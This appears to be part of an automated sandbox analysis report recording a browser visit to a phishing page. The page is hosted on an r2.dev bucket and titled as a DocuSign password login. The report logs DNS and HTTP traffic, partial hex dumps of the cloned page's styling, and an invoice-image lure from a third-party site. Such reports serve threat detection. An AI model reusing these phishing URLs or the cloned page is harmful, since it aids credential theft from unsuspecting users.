                      Jan 15, 2025 01:39:55.943515062 CET53591401.1.1.1192.168.2.4
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 15, 2025 01:39:00.716095924 CET192.168.2.41.1.1.10x5507Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:00.716226101 CET192.168.2.41.1.1.10xf3b0Standard query (0)www.google.com65IN (0x0001)false
                      Jan 15, 2025 01:39:02.307725906 CET192.168.2.41.1.1.10xc54Standard query (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.devA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:02.308813095 CET192.168.2.41.1.1.10xa540Standard query (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.dev65IN (0x0001)false
                      Jan 15, 2025 01:39:02.816545010 CET192.168.2.41.1.1.10x6cdeStandard query (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.devA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:02.816844940 CET192.168.2.41.1.1.10x7aa2Standard query (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.dev65IN (0x0001)false
                      Jan 15, 2025 01:39:03.939138889 CET192.168.2.41.1.1.10xd1c1Standard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:03.939346075 CET192.168.2.41.1.1.10x5736Standard query (0)www.continentalsports.co.uk65IN (0x0001)false
                      Jan 15, 2025 01:39:05.140811920 CET192.168.2.41.1.1.10x8547Standard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:05.140938997 CET192.168.2.41.1.1.10x844dStandard query (0)www.continentalsports.co.uk65IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 15, 2025 01:39:00.722950935 CET1.1.1.1192.168.2.40x5507No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:00.723340034 CET1.1.1.1192.168.2.40xf3b0No error (0)www.google.com65IN (0x0001)false
                      Jan 15, 2025 01:39:02.316836119 CET1.1.1.1192.168.2.40xc54No error (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:02.316836119 CET1.1.1.1192.168.2.40xc54No error (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:02.825675964 CET1.1.1.1192.168.2.40x6cdeNo error (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:02.825675964 CET1.1.1.1192.168.2.40x6cdeNo error (0)pub-73e3a990093147c78a55ab4739ef17e5.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:04.153801918 CET1.1.1.1192.168.2.40xd1c1No error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false
                      Jan 15, 2025 01:39:05.358242989 CET1.1.1.1192.168.2.40x8547No error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false
                      • pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
                      • www.continentalsports.co.uk
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449741172.66.0.235803104C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      Jan 15, 2025 01:39:02.332468033 CET478OUTGET /docu/e_protocol.html HTTP/1.1
                      Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US,en;q=0.9
                      Jan 15, 2025 01:39:02.813405991 CET534INHTTP/1.1 301 Moved Permanently
                      Date: Wed, 15 Jan 2025 00:39:02 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Wed, 15 Jan 2025 01:39:02 GMT
                      Location: https://pub-73e3a990093147c78a55ab4739ef17e5.r2.dev/docu/e_protocol.html
                      Vary: Accept-Encoding
                      Server: cloudflare
                      CF-RAY: 9021ce7238c70f3e-EWR
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                      Jan 15, 2025 01:39:47.823303938 CET6OUTData Raw: 00
                      Data Ascii:


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449743162.159.140.2374433104C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:39:03 UTC706OUTGET /docu/e_protocol.html HTTP/1.1
                      Host: pub-73e3a990093147c78a55ab4739ef17e5.r2.dev
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:39:03 UTC284INHTTP/1.1 200 OK
                      Date: Wed, 15 Jan 2025 00:39:03 GMT
                      Content-Type: text/html
                      Content-Length: 252205
                      Connection: close
                      Accept-Ranges: bytes
                      ETag: "ac9dbd4fd1fb0add29a1b8703bce9406"
                      Last-Modified: Thu, 09 Jan 2025 07:22:53 GMT
                      Server: cloudflare
                      CF-RAY: 9021ce763bbbde9a-EWR
                      2025-01-15 00:39:03 UTC1085INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 61 63 63 6f 75 6e 74 2d 73 65 72 76 65 72 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 44 6f 63 75 53 69 67 6e 20 4c 6f 67 69 6e 20 2d 20 45 6e 74 65 72 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 20 74 6f 20 73 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 3d 63 73 73 20 64 61 74 61 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 7a 2d 73 74 79 6c 65 73 68 65 65 74 3d 31 36 3e 2e 61 63 63 6f 75 6e 74 2d 73 65 72 76
                      Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv
                      2025-01-15 00:39:03 UTC1369INData Raw: 69 6e 6b 2d 62 6f 64 79 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 69 6e 6b 2d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 7d 2e 69 6e 6b 2d 70 61 67 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 72 65 6d 7d 2e 69 6e 6b 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                      Data Ascii: ink-body{justify-content:center}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}.ink-page-title{margin-bottom:1rem}.ink-form-unit{margin-top:1.5rem}.ink-form-unit:first-child{margin-top:2rem}.ink-secondary-button
                      2025-01-15 00:39:03 UTC1369INData Raw: 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2a 2c 3a 3a 61 66 74 65 72 2c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 44 53 49 6e 64 69 67 6f 22 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 64 61 74 61 3a 66 6f 6e 74 2f 77 6f 66 66 32 3b 62 61 73 65 36 34 2c 64 30 39 47 4d 67 41 42 41 41 41 41 41 48 4e 4d 41 42 49 41 41 41 41 42 59 73 77 41 41 48 4c 6b 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                      Data Ascii: t-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}*,::after,::before{box-sizing:inherit}@font-face{font-family:"DSIndigo";font-style:normal;font-weight:400;src:url(data:font/woff2;base64,d09GMgABAAAAAHNMABIAAAABYswAAHLkAAEAAAAAAAAAAAAAAAAAAAAAAAAA
                      2025-01-15 00:39:03 UTC1369INData Raw: 39 37 64 2f 4f 2f 52 6b 6a 39 6e 79 59 4f 36 43 48 78 45 54 38 30 77 58 48 74 48 74 63 78 64 31 6e 72 41 54 65 72 6c 46 4a 4b 4b 54 71 6e 6a 32 48 5a 76 67 75 4b 46 44 7a 56 42 53 72 61 33 55 65 6b 54 61 4a 74 2b 76 64 72 67 62 59 57 78 52 51 4b 48 53 4a 57 61 48 48 36 74 58 68 7a 61 77 2f 31 6a 6b 31 38 2f 61 50 6e 62 36 43 55 5a 42 53 30 30 66 79 75 64 35 54 66 6e 75 2f 35 6e 6f 39 47 6f 79 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 67 36 4f 6a 72 61 72 77 48 34 39 65 32 37 77 62 6c 48 55 78 52 46 30 52 52 4e 36 2f 44 41 4c 64 6f 6c 47 6b 56 52 4e 49 6f 75 43 37 53 7a 2f 4d 4a 5a 71 41 55 45 4b 48 4d 79 7a 75 79 45 64 6c 63 2b 61 5a 75 41 41 67 41 2f 31 64 53 76 61 35 58 6b 2f 6d 6b 46 5a 71 78 6b 50 69 52 2f 41 50 6a 73 41
                      Data Ascii: 97d/O/Rkj9nyYO6CHxET80wXHtHtcxd1nrATerlFJKKTqnj2HZvguKFDzVBSra3UekTaJt+vdrgbYWxRQKHSJWaHH6tXhzaw/1jk18/aPnb6CUZBS00fyud5Tfnu/5no9GoyiKoiiKoiiKoiiKoiiKoiiKoig6OjrarwH49e27wblHUxRF0RRN6/DALdolGkVRNIouC7Sz/MJZqAUEKHMyzuyEdlc+aZuAAgA/1dSva5Xk/mkFZqxkPiR/APjsA
                      2025-01-15 00:39:03 UTC1369INData Raw: 56 37 62 7a 51 6d 4e 31 7a 30 46 42 73 49 4f 5a 4b 32 45 45 62 53 6a 62 52 6c 45 38 4f 71 57 65 62 63 6f 57 77 6b 6f 43 6e 6e 54 6c 4f 4f 35 2b 68 50 47 6a 6b 64 33 69 34 71 79 49 56 73 53 69 76 6f 63 4d 41 37 6c 2b 41 66 6c 5a 35 37 70 68 6a 2f 39 76 69 37 7a 2b 79 63 75 78 7a 39 2f 32 37 49 64 6d 4f 33 74 4f 38 58 6f 37 58 6d 50 36 45 69 4d 6b 70 44 5a 32 55 5a 79 57 6b 6c 4a 43 52 77 73 39 4d 44 7a 33 68 65 7a 47 6a 78 6e 37 74 37 45 56 69 50 38 77 68 68 45 4e 78 68 78 32 50 4d 6c 57 58 79 44 7a 70 4c 46 34 7a 37 38 75 58 7a 49 70 61 57 47 74 6d 6f 2b 58 4b 6e 74 66 45 69 2f 4d 6c 63 79 5a 59 4c 72 2f 77 77 6d 4f 49 4e 2b 68 51 46 70 30 49 76 6b 54 2f 71 2b 4b 43 6f 6c 4c 7a 51 36 41 76 4d 63 50 77 31 43 43 55 70 49 77 68 6b 49 78 54 38 34 4c 6b 78 69
                      Data Ascii: V7bzQmN1z0FBsIOZK2EEbSjbRlE8OqWebcoWwkoCnnTlOO5+hPGjkd3i4qyIVsSivocMA7l+AflZ57phj/9vi7z+ycuxz9/27IdmO3tO8Xo7XmP6EiMkpDZ2UZyWklJCRws9MDz3hezGjxn7t7EViP8whhENxhx2PMlWXyDzpLF4z78uXzIpaWGtmo+XKntfEi/MlcyZYLr/wwmOIN+hQFp0IvkT/q+KColLzQ6AvMcPw1CCUpIwhkIxT84Lkxi
                      2025-01-15 00:39:03 UTC1369INData Raw: 64 59 66 4f 4d 43 65 75 50 54 46 49 72 54 6f 6f 75 6d 68 36 44 42 67 79 4e 70 4f 4a 57 55 79 5a 64 30 73 30 75 2b 70 43 57 72 7a 68 52 31 52 54 55 46 4b 6c 53 5a 63 68 6b 30 53 57 6e 46 53 38 31 30 71 55 71 76 6c 32 4a 54 71 4a 62 58 54 5a 69 34 4d 4f 4f 65 4b 59 55 38 34 34 6c 77 76 6b 34 74 32 6c 58 4a 36 75 75 4f 71 61 36 32 37 6c 44 75 37 6c 41 56 35 34 35 63 32 64 4c 32 6a 66 64 46 33 63 77 43 34 65 6f 6b 50 77 50 53 55 6d 61 54 47 6b 7a 34 6e 45 35 6f 36 4d 65 52 30 4d 41 5a 49 75 6f 61 45 58 66 63 2b 41 49 65 50 4d 68 49 6c 5a 6a 57 56 4d 49 32 61 54 65 62 56 41 73 34 78 56 73 6d 62 54 62 56 48 73 69 50 32 46 73 48 72 69 38 59 37 76 4b 37 2b 49 53 4c 4b 54 49 72 57 6d 59 61 54 4c 6b 45 6b 69 53 30 35 79 49 33 6b 71 58 34 46 43 78 53 6c 42 71 54 4c
                      Data Ascii: dYfOMCeuPTFIrTooumh6DBgyNpOJWUyZd0s0u+pCWrzhR1RTUFKlSZchk0SWnFS810qUqvl2JTqJbXTZi4MOOeKYU844lwvk4t2lXJ6uuOqa627lDu7lAV545c2dL2jfdF3cwC4eokPwPSUmaTGkz4nE5o6MeR0MAZIuoaEXfc+AIePMhIlZjWVMI2aTebVAs4xVsmbTbVHsiP2FsHri8Y7vK7+ISLKTIrWmYaTLkEkiS05yI3kqX4FCxSlBqTL
                      2025-01-15 00:39:03 UTC1369INData Raw: 37 4b 4a 48 53 75 77 42 4b 41 4c 5a 6d 58 42 2b 61 34 57 6c 63 36 55 78 6f 6b 67 4c 68 67 56 70 48 52 46 30 71 34 35 77 59 72 4f 68 69 43 47 71 6a 52 67 72 73 61 30 56 68 43 36 30 7a 51 6e 4c 6e 73 79 57 73 67 77 65 31 7a 58 31 4e 74 41 31 37 7a 34 67 6a 33 4d 59 30 33 38 56 6c 74 36 44 69 2f 50 4d 49 51 49 6c 67 4c 67 6b 34 73 54 65 44 74 51 46 57 32 79 64 67 67 65 4b 58 58 59 41 52 2b 55 41 63 32 57 65 63 37 76 56 70 6b 46 51 77 64 48 46 75 67 46 54 4a 51 6b 58 4e 55 45 70 61 62 5a 34 6b 2b 6e 36 74 36 2b 6c 41 35 54 6c 75 2f 4f 33 77 45 69 67 64 64 70 58 6c 65 31 67 66 59 55 37 41 4d 55 67 6b 6c 6b 42 6f 65 56 71 45 65 59 6b 6a 34 64 44 4f 61 67 68 75 62 31 7a 51 57 76 46 34 48 53 63 6e 33 78 52 74 64 55 6b 4e 4d 74 55 76 70 39 42 67 54 44 63 49 6c 73
                      Data Ascii: 7KJHSuwBKALZmXB+a4Wlc6UxokgLhgVpHRF0q45wYrOhiCGqjRgrsa0VhC60zQnLnsyWsgwe1zX1NtA17z4gj3MY038Vlt6Di/PMIQIlgLgk4sTeDtQFW2ydggeKXXYAR+UAc2Wec7vVpkFQwdHFugFTJQkXNUEpabZ4k+n6t6+lA5Tlu/O3wEigddpXle1gfYU7AMUgklkBoeVqEeYkj4dDOaghub1zQWvF4HScn3xRtdUkNMtUvp9BgTDcIls
                      2025-01-15 00:39:03 UTC1369INData Raw: 64 37 43 30 46 65 59 65 6c 4b 7a 44 44 5a 54 42 30 36 2f 45 55 48 6f 42 31 50 6a 6c 7a 44 2f 61 70 79 73 74 53 57 67 6c 7a 6d 32 76 61 49 73 63 61 35 6c 48 31 33 71 42 39 67 42 62 68 6b 43 48 56 63 65 53 6a 59 30 31 52 2f 65 4d 36 74 6a 72 58 6b 36 54 70 6e 63 61 77 43 75 34 46 49 31 49 71 36 6e 64 47 75 59 74 32 71 33 34 74 46 55 74 61 77 4d 57 72 54 49 72 4c 4a 45 4d 6f 46 65 5a 41 36 73 76 2b 4e 79 70 35 59 54 79 6e 78 68 45 44 73 33 54 37 35 47 7a 6d 55 69 33 5a 6c 53 37 4b 79 51 35 68 54 30 55 2b 57 6c 48 6b 69 6d 43 2b 75 48 7a 62 41 4e 6b 67 30 52 44 55 73 61 6f 54 50 5a 42 6f 56 4e 51 2b 52 6e 35 57 48 31 69 71 72 65 59 31 32 48 56 75 48 59 4c 33 45 42 71 6d 4e 4d 70 73 45 6d 7a 56 73 6b 64 75 71 73 45 33 44 64 71 57 54 75 39 6f 70 7a 68 53 63 52
                      Data Ascii: d7C0FeYelKzDDZTB06/EUHoB1PjlzD/apystSWglzm2vaIsca5lH13qB9gBbhkCHVceSjY01R/eM6tjrXk6TpncawCu4FI1Iq6ndGuYt2q34tFUtawMWrTIrLJEMoFeZA6sv+Nyp5YTynxhEDs3T75GzmUi3ZlS7KyQ5hT0U+WlHkimC+uHzbANkg0RDUsaoTPZBoVNQ+Rn5WH1iqreY12HVuHYL3EBqmNMpsEmzVskduqsE3DdqWTu9opzhScR
                      2025-01-15 00:39:03 UTC1369INData Raw: 48 35 31 48 2f 4f 6b 4c 31 73 46 33 47 68 69 57 37 6c 55 55 71 64 4e 42 66 53 61 53 43 7a 4f 6c 64 72 55 6c 2f 49 35 6c 36 75 36 59 30 43 61 4e 63 65 32 72 70 77 4e 54 77 57 64 35 39 4f 77 33 69 74 38 6d 34 55 67 4e 51 4e 4d 63 41 75 4b 71 54 4b 53 46 4b 55 78 53 70 76 44 59 43 4b 70 70 6a 41 42 71 74 35 4a 70 64 51 58 6f 6e 44 38 73 51 61 6b 6f 73 79 57 73 54 55 6d 32 54 41 50 52 67 5a 41 71 38 76 70 33 76 46 46 72 48 58 54 45 54 77 70 6b 56 4f 6a 56 6c 5a 66 4c 54 41 66 7a 39 68 61 4d 70 69 7a 57 32 2b 56 2f 67 54 64 5a 34 53 51 54 66 30 61 68 39 6f 4a 75 65 68 39 7a 56 76 56 47 5a 37 53 34 4f 44 30 79 2f 6f 30 54 76 71 30 56 63 47 4f 76 72 4c 72 32 55 6e 34 70 4b 4c 75 2f 59 58 38 32 66 54 55 70 4e 48 6b 38 69 42 45 6d 4a 36 42 67 52 30 2b 52 4c 53 4c
                      Data Ascii: H51H/OkL1sF3GhiW7lUUqdNBfSaSCzOldrUl/I5l6u6Y0CaNce2rpwNTwWd59Ow3it8m4UgNQNMcAuKqTKSFKUxSpvDYCKppjABqt5JpdQXonD8sQakosyWsTUm2TAPRgZAq8vp3vFFrHXTETwpkVOjVlZfLTAfz9haMpizW2+V/gTdZ4SQTf0ah9oJueh9zVvVGZ7S4OD0y/o0Tvq0VcGOvrLr2Un4pKLu/YX82fTUpNHk8iBEmJ6BgR0+RLSL
                      2025-01-15 00:39:03 UTC1369INData Raw: 50 64 6a 61 6e 78 68 64 63 72 48 67 6a 79 75 30 4c 47 31 6d 2f 4e 66 4e 31 4d 30 50 45 2b 34 66 44 78 4c 56 36 52 38 67 6c 77 4e 64 61 71 6c 47 59 35 74 34 5a 6b 38 76 33 63 76 6a 76 64 73 2f 36 31 65 42 51 7a 38 61 47 65 37 30 4e 56 39 4e 68 53 62 55 79 47 65 66 52 35 4b 50 75 67 58 76 75 59 62 65 69 74 37 5a 7a 57 52 6c 65 37 48 52 38 76 70 48 36 71 38 4c 64 36 79 6d 50 53 45 4c 33 33 48 69 2b 46 75 54 51 6d 47 68 6b 58 58 5a 75 74 5a 72 47 7a 74 37 36 41 37 59 61 42 51 47 6f 53 63 32 7a 71 55 31 6f 6b 4c 4b 77 61 50 74 45 53 32 61 59 31 66 30 46 74 68 6f 4a 4b 6d 2f 74 57 34 44 7a 77 64 70 7a 4c 53 43 38 6d 47 68 30 59 4a 77 58 65 52 38 69 39 67 39 53 38 6d 64 76 71 38 2f 41 58 31 6c 4c 71 69 76 4d 5a 6e 75 7a 45 38 6d 6d 4f 74 47 6e 62 6d 44 2f 32 5a
                      Data Ascii: PdjanxhdcrHgjyu0LG1m/NfN1M0PE+4fDxLV6R8glwNdaqlGY5t4Zk8v3cvjvds/61eBQz8aGe70NV9NhSbUyGefR5KPugXvuYbeit7ZzWRle7HR8vpH6q8Ld6ymPSEL33Hi+FuTQmGhkXXZutZrGzt76A7YaBQGoSc2zqU1okLKwaPtES2aY1f0FthoJKm/tW4DzwdpzLSC8mGh0YJwXeR8i9g9S8mdvq8/AX1lLqivMZnuzE8mmOtGnbmD/2Z


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.44974595.154.228.1774433104C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:39:04 UTC635OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:39:05 UTC370INHTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:39:05 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:39:05 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:39:05 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
                      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.44974995.154.228.1774433104C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-15 00:39:06 UTC435OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
                      Host: www.continentalsports.co.uk
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-15 00:39:06 UTC370INHTTP/1.1 200 OK
                      Server: nginx/1.10.3 (Ubuntu)
                      Date: Wed, 15 Jan 2025 00:39:06 GMT
                      Content-Type: image/jpeg
                      Content-Length: 7494
                      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
                      Connection: close
                      ETag: "62e062bc-1d46"
                      Expires: Thu, 15 Jan 2026 00:39:06 GMT
                      Cache-Control: max-age=31536000
                      Cache-Control: public
                      X-Frame-Options: SAMEORIGIN
                      Accept-Ranges: bytes
                      2025-01-15 00:39:06 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
                      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


                      020406080s020406080100

                      Click to jump to process

                      020406080s0.0050100MB

                      Click to jump to process

                      Target ID:0
                      Start time:19:38:52
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff76e190000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
